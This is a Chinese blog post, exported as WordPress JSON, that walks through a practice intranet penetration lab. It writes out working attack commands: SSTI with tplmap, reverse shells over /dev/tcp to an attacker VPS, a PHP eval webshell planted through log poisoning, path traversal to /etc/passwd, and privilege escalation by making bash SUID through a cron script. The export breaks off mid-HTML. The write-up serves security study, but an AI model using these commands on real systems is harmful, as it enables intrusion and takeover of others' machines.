{"id":675,"date":"2023-06-15T13:54:44","date_gmt":"2023-06-15T05:54:44","guid":{"rendered":"http:\/\/119.45.47.125\/?p=675"},"modified":"2023-07-06T15:06:53","modified_gmt":"2023-07-06T07:06:53","slug":"euler1","status":"publish","type":"post","link":"http:\/\/119.45.47.125\/index.php\/2023\/06\/15\/euler1\/","title":{"rendered":"\u5185\u7f51\u9776\u573a\u7ec3\u4e60\uff08\u4e00\uff09"},"content":{"rendered":"<blockquote>\n  \u5185\u7f51\u9776\u573a\u6253\u5f97\u4e0d\u591a\uff0c\u78b0\u5de7\u5728 \u201c \u5228\u6d1e\u5b89\u5168\u56e2\u961f\u201d \u516c\u4f17\u53f7\u4e0a\u770b\u89c1\u4e86\u4e00\u4e2a\u7ec3\u4e60\u9776\u573a\uff0c\u78d5\u78d5\u7eca\u7eca\u505a\u4e86\u4e0b\u6765\uff0c\u6709\u7684\u5730\u65b9\u8fd8\u4e0d\u662f\u5f88\u6e05\u695a\uff0c\u5148\u7b80\u5355\u8bb0\u5f55\u4e0b<br>\n  \u9776\u573a\u7684\u5b98\u65b9 WP \u5730\u5740<a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/mp.weixin.qq.com\/s\/wi-vyQod3UHuX-g3_w4fiQ\" title=\"\u300a\u6b27\u62c9\u4e00\u53f7 Writeup\uff01\u300b\">\u300a\u6b27\u62c9\u4e00\u53f7 Writeup\uff01\u300b<\/a>\n<\/blockquote>\n<hr \/>\n<p><strong>\u5176\u4ed6\u53c2\u8003\u6587\u7ae0\uff1a<\/strong><\/p>\n<ul><li><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/www.freebuf.com\/articles\/web\/254452.html\" title=\"\u300a\u7ea2\u961f\u6d4b\u8bd5\u4e4bLinux\u63d0\u6743\u5c0f\u7ed3\u300b\">\u300a\u7ea2\u961f\u6d4b\u8bd5\u4e4bLinux\u63d0\u6743\u5c0f\u7ed3\u300b<\/a><\/li>\n<li><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/threezh1.com\/2020\/01\/30\/NodeJsVulns\" title=\"\u300aNode.js \u5e38\u89c1\u6f0f\u6d1e\u5b66\u4e60\u4e0e\u603b\u7ed3\u300b\">\u300aNode.js \u5e38\u89c1\u6f0f\u6d1e\u5b66\u4e60\u4e0e\u603b\u7ed3\u300b<\/a><\/li>\n<li><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/cloud.tencent.com\/developer\/article\/1028404\" title=\"\u300aSMB\u5171\u4eab\u4e4bSCF\u6587\u4ef6\u653b\u51fb\u89e3\u6790\u300b\">\u300aSMB\u5171\u4eab\u4e4bSCF\u6587\u4ef6\u653b\u51fb\u89e3\u6790\u300b<\/a><\/li>\n<\/ul>\n<hr \/>\n<h3>\u5916\u7f51\u6253\u70b9<\/h3>\n<hr \/>\n<p>\u8bbf\u95ee\u9776\u673a\uff0c\u8fd4\u56de\u5982\u4e0b\u9875\u9762<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-1024x274.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-1024x274.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u89c2\u5bdf\u5230 Python \u548c Flask\uff0c\u8003\u8651\u5b58\u5728 SSTI\uff0c\u4f46\u662f\u53c2\u6570\u672a\u77e5\uff0c\u5148\u8fdb\u884c\u63a2\u6d4b<\/p>\n<p><code>python arjun.py -u <a href=\"http:\/\/ip\/\">http:\/\/ip\/<\/a> --get<\/code><\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-1-1024x368.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-1-1024x368.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u63a2\u6d4b\u5230 GET \u65b9\u5f0f\u53c2\u6570 <code>name<\/code>\uff0c\u76f4\u63a5\u5c1d\u8bd5 <code>?name={{7*7}}<\/code><\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-2-1024x457.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-2-1024x457.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u76f4\u63a5\u4e0a tplmap\uff0c<code>python tplmap.py -u '<a href=\"http:\/\/ip\/?name=1\">http:\/\/ip\/?name=1<\/a>' --os-shell<\/code>\uff0c\u53ef\u4ee5\u547d\u4ee4\u6267\u884c\u4e14\u6743\u9650\u4e3a root<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-3-1024x517.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-3-1024x517.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<hr \/>\n<h3>\u4fe1\u606f\u6536\u96c6\u4e0e\u4ee3\u7406\u8f6c\u53d1<\/h3>\n<hr \/>\n<p>\u5148\u5224\u65ad\u9776\u673a\u51fa\u7f51\u60c5\u51b5 <code>curl -v lyzdzl.dnslog.cn<\/code><\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-4.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-4.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u53ef\u4ee5\u51fa\u7f51\uff0c\u67e5\u770b ip \u914d\u7f6e\u60c5\u51b5\uff0c<code>ifconfig<\/code> \u6ca1\u6709\u8f93\u51fa\uff0c\u6362\u6210 <code>ip addr<\/code> \u53d1\u73b0\u53cc\u7f51\u5361<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-5-1024x344.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-5-1024x344.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>VPS \u5f00\u7aef\u53e3\u76d1\u542c nc -lvvp port\uff0c\u9776\u673a\u8fde\u63a5 <code>bash -c &quot;bash -i &gt;&amp; \/dev\/tcp\/vps\/port 0&gt;&amp;1&quot;<\/code><\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-6-1024x426.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-6-1024x426.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>ifconfig \u6ca1\u6709\u5b89\u88c5\uff0c\u6240\u4ee5\u4e4b\u524d\u6ca1\u6709\u56de\u663e<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-7.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-7.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u4e0b\u8f7d fscan \u5230\u9776\u673a <code>curl -O <a href=\"http:\/\/ip\/fscan_amd64\">http:\/\/ip\/fscan_amd64<\/a><\/code>\uff0c\u5f00\u626b<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-8-1024x101.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-8-1024x101.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-9-1024x550.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-9-1024x550.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u5173\u6ce8\u70b9\u5728 .101\/102\/200\/201 \u4e0a\u9762\uff0c\u914d\u7f6e NPS+SwitchyOmega \u4ee3\u7406\u8f6c\u53d1<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-10-1024x387.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-10-1024x387.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<hr \/>\n<h3>\u7b2c\u4e00\u53f0\u673a\u5668<\/h3>\n<hr \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/12-0-1024x515.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/12-0-1024x515.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u89c2\u5bdf\u5230 <code>include.php?file=<\/code> \u7684\u8bbf\u95ee\u8def\u5f84\uff0c\u8003\u8651\u5b58\u5728\u6587\u4ef6\u5305\u542b\uff0c<code>?file=..\/..\/..\/..\/..\/etc\/passwd<\/code><\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/12-1-1-1024x412.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/12-1-1-1024x412.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u5c1d\u8bd5\u65e5\u5fd7\u5305\u542b\u5199 shell\uff0c<code>?file=xxx User-Agent: &lt;?php @eval($_POST[1]);?&gt;<\/code><\/p>\n<p>\u5305\u542b\u6267\u884c\uff0c<code>POST ?file=..\/..\/..\/..\/var\/log\/nginx\/access.log 1=phpinfo();<\/code><\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/12-0-1-1024x449.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/12-0-1-1024x449.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u6302\u8681\u5251\u8d70\u4ee3\u7406\uff0c\u6743\u9650\u4e3a nginx\uff0c\u4e0d\u51fa\u7f51\uff0c\u9700\u8981\u63d0\u6743<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/12-1-2-1024x579.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/12-1-2-1024x579.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/12-2-1024x128.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/12-2-1024x128.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p><code>sudo -l<\/code> \u4e0d\u53ef\u884c\uff0c\u63a2\u4e00\u4e0b\u53ef\u6267\u884c\u8def\u5f84\u548c SUID \u6743\u9650<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-11.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-11.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>pkexec \u6ca1\u6cd5\u63d0\u6743\uff0c\u800c\u540e\u53d1\u73b0\u5728 <code>config.php<\/code> \u5b58\u5728\u6570\u636e\u5e93\u914d\u7f6e\u5bc6\u7801\uff0c\u8003\u8651\u5bc6\u7801\u590d\u7528<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/12-2-1-1024x333.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/12-2-1-1024x333.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u4f46\u662f\u5f53\u524d\u662f\u8681\u5251\u7684\u547d\u4ee4\u6267\u884c\u73af\u5883\uff0c\u975e\u4ea4\u4e92\u5f0f shell\uff0c\u9700\u8981\u518d\u8f6c\u53d1\u4e00\u4e0b\uff0c\u8f6c\u53d1\u5230 .100 \u4e0a\u7684\u67d0\u4e2a\u7aef\u53e3<\/p>\n<p>\u56e0\u4e3a .100 \u51fa\u7f51\uff0c\u76f4\u63a5 <code>yum install -y nc<\/code>\uff0c\u7136\u540e\u5f00\u542f\u76d1\u542c <code>nc -lvnp 9997<\/code>\uff0c.101 \u5728\u8681\u5251\u4e0a\u6267\u884c <code>bash -i &gt;&amp; \/dev\/tcp\/10.10.10.100\/9997 0&gt;&amp;1<\/code> \u5f39\u56de\u6765<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/12-3-1024x275.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/12-3-1024x275.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>su \u5207\u6362\u7528\u6237<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/12-4.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/12-4.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u518d\u7528 pspy64 \u63a2\u4e00\u4e0b\uff0c\u53d1\u73b0 root \u4f1a\u6267\u884c \/home\/catcat\/bashup.sh<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-12-1024x146.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-12-1024x146.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u8003\u8651\u901a\u8fc7\u4fee\u6539\u8ba1\u65f6\u4efb\u52a1\u63d0\u6743 <code>echo -e &quot;#!\/bin\/bash\\nchmod 4755 \/bin\/bash&quot;<\/code>\uff0c\u800c\u540e <code>bash -p<\/code> \u5373\u53ef<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-13.png'><img class=\"lazyload lazyload-style-1\" 